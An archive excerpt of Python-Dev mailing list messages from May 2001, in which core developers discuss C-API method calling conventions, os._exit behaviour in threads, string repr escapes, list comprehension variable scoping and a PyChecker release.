        print "..." % locals()

to people mutating locals() at module level because they simply don't understand that globals() is the same (but correct) thing to use there. Due to the first example, and as Samuele may have already suggested, we at least need to implement a mapping object capturing name bindings before we can even think about deprecating locals() for real. From tim.one@home.com Tue May 29 01:01:33 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 20:01:33 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B1214B3.9A4C295D@lemburg.com> Message-ID: [Tim] > Wait for what? If it were possible, is the chance that you'd > take time to rework unicodeobject.c to "subclass from a generic > abstract string object" greater than 0? The chance that I > would is exactly 0. [MAL] > Well, that's hard to say. It would certainly be low-priority; > same for the above refactoring.
I think you must have missed this when it first came up here: /F suggested that *he* had a non-zero chance of implementing his suggestion. That makes it far closer to reality than anything that's been suggested since . From tim.one@home.com Tue May 29 01:42:54 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 20:42:54 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <3B121814.E5E9896A@lemburg.com> Message-ID: [MAL] > If we end up only optimizing the re.match("O+") case, we wouldn't need > the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick > and Martin could call the underlying API with one or more PyObject* > taken directly from the Python VM stack. How then does the callee know it was called with the correct # of arguments? By adding enough pointer arguments to cover the longest possible O+ string plus 1, then verifying that the one just beyond the last one it expects is NULL, while the ones before that are not? Adding another "# of arguments" member to the method table? Inventing METH_O, METH_OO, METH_OOO, ...? > In that case, please consider at least supporting "O", "OO" and "OOO" > with optional arguments treated like I suggested in an earlier > posting (simply pass NULL and let the API take care of assigning > a default value). > > This would take care of most builtins: You don't have to convince me that cases other than plain "O" exist. What's missing is data in support of the idea that calls to those are relatively frequent enough that it's a NET win to slow plain "O" in order to speed the additional cases when they happen. For example, it's not possible for calls to reduce() to have a high hit rate in real life, because builtin_reduce is a very expensive function -- there's only so many of those you can cram into a second even if the calling overhead is 0. OTOH, add a single branch to the time it takes to find builtin_type and you've slowed its *total* execution time significantly. 
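The difference between the two calling conventions argued about here can be modelled in a few lines of Python. This is a toy sketch, not CPython's C code: the hypothetical `oldargs_receive` mimics the single argument a METH_OLDARGS function sees (NULL, modelled as `None`, for no arguments; the bare object for one; the whole tuple for several), and the hypothetical `meth_o_receive` mimics METH_O's up-front check for exactly one argument, as Martin describes it.

```python
def oldargs_receive(*args):
    """Toy model of the argument a METH_OLDARGS C function receives."""
    if len(args) == 0:
        return None          # the C function would see NULL
    if len(args) == 1:
        return args[0]       # a single argument is passed through unwrapped
    return args              # several arguments arrive packed into one tuple


def meth_o_receive(*args):
    """Toy model of METH_O: the caller insists on exactly one argument."""
    if len(args) != 1:
        raise TypeError("function takes exactly one argument (%d given)" % len(args))
    return args[0]


# The ambiguity Martin and Tim point out: f((1, 2)) and f(1, 2) look identical.
print(oldargs_receive((1, 2)) == oldargs_receive(1, 2))

# METH_O rejects the second form before the function body ever runs.
try:
    meth_o_receive(1, 2)
except TypeError as exc:
    print("TypeError:", exc)
```

For comparison, in current CPython 3 builtin methods use dedicated flags such as METH_NOARGS and METH_O, and the keyword-argument hole Tim shows in a later message is closed: `{}.clear(val=12)` raises TypeError.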
The implementation of METH_O alone is a pure win by any measure. So would be implementing METH_OO alone, or METH_OOO alone, etc. Mix them, and they all get slower than they could have been. All the data we have says METH_O is the single most important case, and that jibes with common sense, so I believe it. If you want to speed everything, fine, do that, but that likely requires a preprocessing phase so that type signatures don't have to be resolved at runtime at all. So long as we're just looking at simple hacks, "the simpler the better" is good advice and should rule in the absence of compelling evidence against it. From tim.one@home.com Tue May 29 02:14:16 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 21:14:16 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > Because it is a METH_OLDARGS method, you can do > > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Guido won't, and if he had even a twinge of doubt, Thomas's explanation of how this bug was introduced in 2.0 would erase it. The list.append() docs were arguably unclear when that brouhaha hit, but there's nothing unclear about the file.writelines() docs. OTOH, the file.writelines() docs still say a list is required, not "a sequence" as the 2.0 (+ current) code actually implements. Hmm. Wonder whether writelines() should be generalized to allow an iterable object? From tim.one@home.com Tue May 29 02:49:29 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 21:49:29 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: [Aahz] > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) 
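Both outcomes are visible in today's Python: a file object's `writelines()` takes exactly one argument, and it accepts any iterable of strings, not only a list. The sketch below uses `io.StringIO` as an in-memory stand-in for a real file opened for writing. Note that a bare string is itself an iterable of one-character strings, so `writelines("foo\n")` would still succeed.

```python
import io

buf = io.StringIO()  # in-memory stand-in for open(..., "w")

buf.writelines(["foo\n", "bar\n"])        # a list of lines
buf.writelines(s for s in ("baz\n",))     # any iterable works, e.g. a generator

try:
    buf.writelines("foo\n", "bar\n")      # two positional arguments
except TypeError as exc:
    print("rejected:", exc)               # nothing was written by this call

print(repr(buf.getvalue()))
```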
[Tim] > Please open a bug report on that, then, with a tiny test case > if possible. > This worked fine on Win98SE for me just now: [Aahz] > Futz. *Now* it works. Now *what* works? The test case I posted, or the original test case you tried (which you didn't post)? > Chalk it up to another unreproducible bug caused by an unstable Win98. Actually doubt it -- threads are very reliable on Win98, despite that little else is (malloc() is flaky, popen() is a nightmare, etc). Here's a recent bug report on a Red Hot box that may be related: http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 I have no idea what's supposed to happen if you call os._exit from a *spawned* thread (perhaps that's what you did too? I did not) -- threads are outside the scope of the C std, so I suppose it's a x-platform crapshoot. From greg@cosc.canterbury.ac.nz Tue May 29 03:12:55 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:12:55 +1200 (NZST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" > I took a special look at METH_OLDARGS occurrences. Shouldn't all these be removed? I would have thought list.append was the last one! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc.
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Tue May 29 03:33:58 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:33:58 +1200 (NZST) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz> Samuele Pedroni writes: > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging I think there should be methods operating directly on stack frames for debuggers to use. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From jepler@mail.inetnebr.com Tue May 29 03:32:05 2001 From: jepler@mail.inetnebr.com (Jeff Epler) Date: Mon, 28 May 2001 21:32:05 -0500 Subject: [Python-Dev] Killing threads In-Reply-To: ; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400 References: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: <20010528213205.A1236@localhost.localdomain> On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote: > Here's a recent bug report on a Red Hot box that may be related: > > http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 > > I have no idea what's supposed to happen if you call os._exit from a > *spawned* thread (perhaps that's what you did too? I did not) -- threads > are outside the scope of the C std, so I suppose it's a x-platform > crapshoot. I wrote that program after the first go-round about _exit and threads, and when I got behavior I didn't expect, I entered it in the SF bug tracker. 
My reasoning: The documentation for _exit() says it is "used to exit the child process after a fork()", and my model for thinking about threads is that they're "child processes, but ...". Thus, invoking os._exit() in a thread made sense to me, meaning "ask the OS to destroy this thread now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a good one, though my suspicion (which I did not voice in the SF report) was that perhaps the thread which called _exit() held the GIL, in which case it was in some sense Python's fault that execution didn't continue. In any case, I don't have the faintest idea how to program threads in C/pthreads, so I can't write the "equivalent C program". In fact, a traceback from the hung "sleep(1)" thread shows

(gdb) where
#0 0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1 0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934
#2 0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34
#3 0x08067ba0 in PyThread_acquire_lock () at eval.c:41
#4 0x08051ff1 in PyEval_RestoreThread () at eval.c:41
#5 0x40019ef9 in floatsleep () at eval.c:41
#6 0x400193fd in time_sleep () at eval.c:41
[...]

While those line numbers look a little fishy (eval.c:41 for all three frames?), I think this might support my supposition. Of course, if os._exit() has no intended use in a threaded program, then this behavior is as good as any.
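For what Jeff actually wanted, ending one thread while the rest of the program carries on, Tim's reply points at `thread.exit()`. In Python 3 that module is named `_thread`, and `_thread.exit()` raises `SystemExit` in the calling thread, which the `threading` machinery silently ignores for worker threads. A minimal sketch (not Jeff's original program); by contrast, current Python documents `os._exit()` as exiting the whole process without running cleanup handlers.

```python
import _thread
import threading

events = []

def worker():
    events.append("worker started")
    _thread.exit()                 # raises SystemExit: ends this thread only
    events.append("never reached")

t = threading.Thread(target=worker)
t.start()
t.join()

# The main thread keeps running after the worker has ended itself.
events.append("main thread still alive")
print(events)
```

Returning normally from the thread's target function has the same effect and is usually the cleaner choice; the explicit exit is mainly useful deep inside nested calls.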
Jeff From tim.one@home.com Tue May 29 05:03:38 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 00:03:38 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010528213205.A1236@localhost.localdomain> Message-ID: [Jeff Epler, on http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 ] > My reasoning: The documentation for _exit() says it is "used to exit the > child process after a fork()", and my model for thinking about threads > is that they're "child processes, but ...". Thus, invoking os._exit() > in a thread made sense to me, meaning "ask the OS to destroy this thread > now, but leave my file descriptors, etc., alone for the other threads." You need a Linux expert to address this. Threads and processes are different beasts under most flavors of Unix, but Linux confuses them; I've no idea how _exit() is supposed to work there, and that's why I asked (in the bug report) what the Linux docs say about that (_exit() is supplied by your local C library; Python just wraps it). If what you really wanted was just to abort the thread, use thread.exit() (see the thread docs). os._exit() is a dangerous thing even in the best of conditions; unsure why the Python docs suggest using it. > Your suggestion in the tracker of writing the equivalent C program is a > good one, though my suspicion (which I did not voice in the SF report) > was that perhaps the thread which called _exit() held the GIL, in which > case it was in some sense Python's fault that execution didn't continue. Ah, makes sense! Yes, I bet that's what's happening. If so, there's nothing Python can do about it: I'm afraid you did it to yourself. _exit() specifically asks that no cleanup processing be done, and when Python calls it Python never regains control. If you had done an actual fork, fine, the *process* doing the _exit() would never come back to Python, but the GIL in that process has nothing to do with the GIL in the parent process.
But threads share the same GIL, and if you _exit() from a thread holding the GIL then no other thread can ever run again. Looks like it's also platform-dependent: on Windows, _exit() kills the process and every thread ever spawned by that process. Since C doesn't say anything about threads, that can't be called right or wrong. Looks like on Linux _exit() only kills the thread that calls it. > ... > Of course, if os._exit() has no intended use in a threaded program, Right, it wasn't -- unless your program panics and wants to get out ASAP no matter what the consequences. > then this behavior is as good as any. And better than most . From tim.one@home.com Tue May 29 05:16:46 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 00:16:46 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> Message-ID: [Martin] > I took a special look at METH_OLDARGS occurrences. [GregE] > Shouldn't all these be removed? I would have thought > list.append was the last one! I count 42 of them remaining, usually for 0-argument functions. METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can distinguish between "called with nothing" and "called with something" under OLDARGS. However, they don't appear to catch keyword args:

>>> {}.clear(2) # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666) # accepts nonsense silently
>>>

the-more-you-look-the-messier-it-gets-ly y'rs - tim From tim.one@home.com Tue May 29 07:06:19 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 02:06:19 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org> Message-ID: ESR> Apparently the Universe is an even more random place than I ESR> thought. [Barry A.
Warsaw] > here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, That's what Einstein believed (i.e., that it isn't truly random). Unfortunately, according to another recent thread, Einstein was afraid to use equations because he didn't want to cut Stephen Hawking's editor's penis in half -- or something like that. Whichever, consensus still holds that Einstein lost this one. i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace- crying-for-help-ly y'rs - tim From tim.one@home.com Tue May 29 07:15:07 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 02:15:07 -0400 Subject: [Python-Dev] RE: What happened to Idle's extend.py? In-Reply-To: Message-ID: Guido's on vacation. Anyone have an answer for this? I don't, and can't make time to dig into now. If you can, David's address showed up as mailto:boogiemorg@aol.com > -----Original Message----- > From: python-list-admin@python.org > [mailto:python-list-admin@python.org]On Behalf Of David Morgenthaler > Sent: Wednesday, May 23, 2001 6:20 PM > To: python-list@python.org > Subject: What happened to Idle's extend.py? > > > Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was > used to extend Idle. We've used this extensively, building entire > "applications" as Idle extensions. > > Now that we're moving to Python 2.1, we find the same old directions > for extending Idle (in extend.txt), but there appears to be no > extend.py in Idle-0.8. > > Does anyone know how we can add extensions to Idle-0.8? > > Thanks in advance, > David > -- > http://mail.python.org/mailman/listinfo/python-list From mwh@python.net Tue May 29 09:00:42 2001 From: mwh@python.net (Michael Hudson) Date: Tue, 29 May 2001 09:00:42 +0100 (BST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: Message-ID: On Tue, 29 May 2001, Tim Peters wrote: > [Martin] > > I took a special look at METH_OLDARGS occurrences. > > [GregE] > > Shouldn't all these be removed? 
I would have thought > > list.append was the last one! > > I count 42 of them remaining, usually for 0-argument functions. There are more than that; PyMethodDefs that don't put anything in that slot in the source are METH_OLDARGS too, and there are quite a few of them in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the older modules - gl, rotor were easy to find). There are also quite a lot of functions that put literal zeros there, too. So METH_OLDARGS is far from dead, sadly. Cheers, M. From tim.one@home.com Tue May 29 09:04:48 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 04:04:48 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> Message-ID: [from Monday, May 21, 2001 1:04 PM] [Tim] >> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. [Martin v. Loewis] > Any reason why PyThreadState_GET isn't used there? Perhaps somebody's shift key got jammed? sure-don't-see-a-good-reason-ly y'rs - tim From thomas@xs4all.net Tue May 29 10:52:01 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 29 May 2001 11:52:01 +0200 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) Message-ID: <20010529115201.J676@xs4all.nl> Robin apparently ran into a real problem caused by the change in string repr() semantics. Now, arguably this is his own stupid fault (and indeed he argues that himself) but that doesn't mean we shouldn't take this into account. We could, for instance, revert 2.1.1 to the old behaviour, giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide what the string repr() change really wanted was just for the REPL to print it like this, in which case the displayhook should fix it, not string_repr. Opinions ? 
Ping, IIRC, this was your proposal, so yours would be especially valuable ;) ----- Forwarded message from Robin Becker ----- Date: Tue, 29 May 2001 09:58:49 +0100 From: Robin Becker To: Thomas Wouters Cc: python-list@python.org Subject: Re: string repr in 2.1 In message <20010529102414.P690@xs4all.nl>, Thomas Wouters writes >On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote: >> In article , Remco Gerlich >> writes > >> >Since 2.1, string repr uses heximal escapes instead of octal ones. > >> yes I guess all those *nix tools that like octal should be whipped and >> made to obey the malevolent dictator. > >Do you have tools you use to parse quoted (repr'd) Python strings that >handle octal correctly, but don't handle \x and \n\r escape codes ? Which >ones ? And were you aware that they were going to break sooner or later, >just because someone can prefer 'readable' escape codes and feed it that >instead ? :) > Yes I have such tools. One is called Acrobat Reader, another is traditional sed and awk. My dos grep doesn't seem to like hex, I suppose I must update it and all other tools. My C compiler understands octal and the newer ones do hex as well. I can read octal and do arithmetic in it probably easier than hex. I don't defend the octal representation it's just very widespread in the older tools. Our usage of repr was probably stupid as clearly repr can change. How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit cdc! Oh woe is me! Where are the duo-decimal calculators of yore? -- Robin Becker ----- End forwarded message ----- -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
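For tools like the ones Robin mentions that only understand octal escapes, one option is to stop relying on `repr()` and emit the escapes explicitly. The hypothetical helper `octal_quote` below approximates the pre-2.1 style: printable ASCII passes through, backslash and single quote are escaped, and every other byte becomes a three-digit octal escape. Unlike `repr()`, it always uses single quotes.

```python
def octal_quote(data: bytes) -> str:
    """Quote bytes using only octal escapes for non-printable characters."""
    out = []
    for b in data:
        ch = chr(b)
        if ch in "\\'":
            out.append("\\" + ch)      # escape backslash and the quote char
        elif 32 <= b < 127:
            out.append(ch)             # printable ASCII passes through
        else:
            out.append("\\%03o" % b)   # e.g. newline becomes \012
    return "'" + "".join(out) + "'"

print(repr(b"\x01\n"))          # modern repr uses \x.. and \n escapes
print(octal_quote(b"\x01\n"))   # '\001\012'
```

An explicit quoting function like this does not change when `repr()` does, which is the underlying lesson of Robin's report.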
From akuchlin@mems-exchange.org Tue May 29 15:04:37 2001 From: akuchlin@mems-exchange.org (Andrew Kuchling) Date: Tue, 29 May 2001 10:04:37 -0400 Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400 References: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us> On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote: > It looks like I never replied to this. It's probably dropped off >your radar, but I'd say the answer is that the files on parrot should >be discarded sooner rather than later -- when we actually manage to Done. Out of paranoia about doing 'rm -rf' within www.python.org's tree, the files aren't deleted; instead I just moved them to my home directory on parrot. --amk From aahz@rahul.net Tue May 29 16:47:13 2001 From: aahz@rahul.net (Aahz Maruch) Date: Tue, 29 May 2001 08:47:13 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 28, 2001 09:49:29 PM Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net> Tim Peters wrote: > > [Aahz] > > Futz. *Now* it works. > > Now *what* works? The test case I posted, or the original test case you > tried (which you didn't post)? My original test case. I didn't actually preserve it, so the code below was my attempt to reconstruct it (but I think it's pretty close to the test case I tried). Don't worry, if I run into this again, I'll be *much* more careful about preserving the evidence and fiddling with variations; last time I just assumed it was pilot error. 
    from threading import Thread
    import os

    class Foo(Thread):
        def run(self):
            while 1:
                pass

    f = Foo()
    f.start()
    os._exit(1)

From beazley@cs.uchicago.edu Tue May 29 17:56:09 2001 From: beazley@cs.uchicago.edu (David Beazley) Date: Tue, 29 May 2001 11:56:09 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> I'm not sure if this has ever been brought up before (I don't recall seeing it), but I would like to throw out something that has been bugging me about list comprehensions for quite some time... First of all, I have to say that I've really grown to like list comprehensions a lot. In fact, I find myself using them in just about every Python program I've been writing since switching to Python 2.0. However, I've also been shooting myself in the foot a little more than usual due to the following issue: When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x" is evaluated in the local scope (and replaces any previous binding to "x" that might have existed outside the context of the list comprehension). Because of this, I have frequently found myself debugging the following programming error:

    # Some loop
    for x in r:
        ...
        # bunch of statements
        ...
        s = [expr(x) for x in t]
        ...
        # Try to do something with x.
        # ???? What in the hell is wrong with my program ????
        ...

The main problem is that I conceptually tend to think of the list comprehension as being some kind of list operator where the index name is really one of the operands in some sense. Because of this, it is *VERY* easy to get in the habit of throwing list comprehensions all over the place, each of which uses a common index name like x,i,j, etc. Of course, this works just fine until you forget that you're also using x,i,j for some kind of loop variable someplace else :-).
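The pitfall described above is easy to reproduce. Python 2.x list comprehensions behaved like the explicit loop in `loop_version` below, rebinding `x` in the enclosing scope. Python 3 later gave comprehensions their own scope, which is essentially the privacy being asked for here. The function names are illustrative only.

```python
def loop_version(t):
    x = "outer"
    s = []
    for x in t:              # rebinds the function's own x, as 2.x comprehensions did
        s.append(x * 2)
    return s, x


def comprehension_version(t):
    x = "outer"
    s = [x * 2 for x in t]   # in Python 3 this x is private to the comprehension
    return s, x


print(loop_version([1, 2, 3]))           # ([2, 4, 6], 3)
print(comprehension_version([1, 2, 3]))  # ([2, 4, 6], 'outer')
```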
Therefore, I'm wondering if it would make any sense to make the iterator variables used inside of a list comprehension private in some manner--either through name mangling or some other technique? For example:

    s = [expr(x) for x in t]

would get expanded into something roughly like this:

    s = [ ]
    for _mangled_x in t:
        s.append(expr(_mangled_x))
    del _mangled_x

Just as an aside, I have never intentionally used the iterator variable of a list comprehension after the operation has completed. I was actually quite surprised with this behavior the first time I saw it. I suspect most other programmers would not anticipate this side effect either. Comments? Cheers, Dave From nas@python.ca Tue May 29 18:01:41 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 29 May 2001 10:01:41 -0700 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529100141.B18974@glacier.fnational.com> David Beazley wrote: > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. I've been bitten by this one once. It took a while to figure out the problem. I'm not sure that we can change it now though. Neil From skip@pobox.com (Skip Montanaro) Tue May 29 20:03:47 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Tue, 29 May 2001 14:03:47 -0500 Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd) Message-ID: <15123.62099.473259.545781@beluga.mojam.com> I pass this along in case anyone here has some ideas for Jeff about how to work around his problems with pyexpat.c.
Skip
From: Jeff Rush To: Christian Tismer , stackless@starship.python.net Subject: [Stackless] Stackless for 2.1: Progress Report Date: Tue, 29 May 2001 13:06:12 -0500 The port is pretty much done, and it passes the standard Python regression tests, except for the three XML ones. On those it executes an invalid bytecode and later, segfaults. The cause is some code in pyexpat.c that does a PyFrame_New, passing in a *dummy* codeblock (gross!) that actually points to an empty text string (instead of real bytecodes), just to have a codeblock to call PyEval_CallObject() with. I'm trying to find a workaround for that. Does anyone have/want to create some regression tests for Stackless? -Jeff Rush _______________________________________________ Stackless mailing list Stackless@starship.python.net http://starship.python.net/mailman/listinfo/stackless From gward@python.net Tue May 29 22:21:55 2001 From: gward@python.net (Greg Ward) Date: Tue, 29 May 2001 17:21:55 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529172155.A8737@gerg.ca> On 29 May 2001, David Beazley said: > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner--either through name mangling or some other technique? For > example: Two ideas occur to me: * make the list comprehension a new scoping level, which of course is doable now that we have sensible scoping semantics.
Presumably the usual warning message about shadowing variables from an outer scope will apply; you'll still have the bug in your code, but at least Python will tell you about it * don't make list comprehensions a separate scope, but add a little trickery so that something *like* the "shadowing variable from an outer scope" message is emitted Haven't really thought about backwards compatibility issues... Greg From paulp@ActiveState.com Tue May 29 22:55:03 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Tue, 29 May 2001 14:55:03 -0700 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) References: <20010529115201.J676@xs4all.nl> Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com> Thomas Wouters wrote: > > Robin apparently ran into a real problem caused by the change in string > repr() semantics. Now, arguably this is his own stupid fault (and > indeed he argues that himself) but that doesn't mean we shouldn't take this > into account. I think it is done now and it is better this way. The pain is over. Reverting would hurt someone else again. Displayhook should be used sparingly. One of the major virtues of the REPL is that it behaves so much like standard Python. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From tim@digicool.com Tue May 29 23:54:01 2001 From: tim@digicool.com (Tim Peters) Date: Tue, 29 May 2001 18:54:01 -0400 Subject: [Python-Dev] Re: Time for the yearly list.append() panic Message-ID: FYI, I checked in a variation (listobject.c) over the weekend. Win9x is ultimately hopeless, but we can grow a list there to about 35M elements now instead of crapping out at < 2M, and it's zippy the whole way until death. Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was obvious very early there. Now it's flat and fast until physical RAM is exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize points. Fred kindly confirmed that Linux isn't hurt. 
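Tim's listobject.c change concerns how often `append` has to resize the list's underlying array. CPython over-allocates, so reallocations happen only at a small number of lengths and `append` stays amortized constant time. The sketch below observes those resize points through `sys.getsizeof`, which in CPython reflects the allocated capacity. The exact numbers are an implementation detail that differs between versions (and from the 2001 code), so no specific values are claimed.

```python
import sys

def resize_points(n):
    """Return the list lengths at which the allocated size changed."""
    lst, points = [], []
    last = sys.getsizeof(lst)
    for i in range(n):
        lst.append(i)
        size = sys.getsizeof(lst)
        if size != last:          # the list was reallocated on this append
            points.append(len(lst))
            last = size
    return points

points = resize_points(100_000)
print(len(points), "resizes for 100000 appends")
print(points[-5:])                # gaps between resizes grow with the list
```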
Its behavior looks the same as the new Win2K behavior, except that the Linux hiccups are much briefer (although still obvious when they occur). time-for-the-yearly-list.append()-celebration-ly y'rs - tim From PyChecker Wed May 30 03:49:45 2001 From: PyChecker (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: <3B145FC9.49813488@metaslash.com> I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks to everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know.
Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker@metaslash.com From fdrake@cj42289-a.reston1.va.home.com Wed May 30 06:31:01 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 01:31:01 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for development version of Python (2.2). Mostly small updates, but I've worked on new markup for grammar productions used in the Reference Manual. Currently, only the lexical productions in Chapter 2 of the manual have been converted to the new markup and layout. 
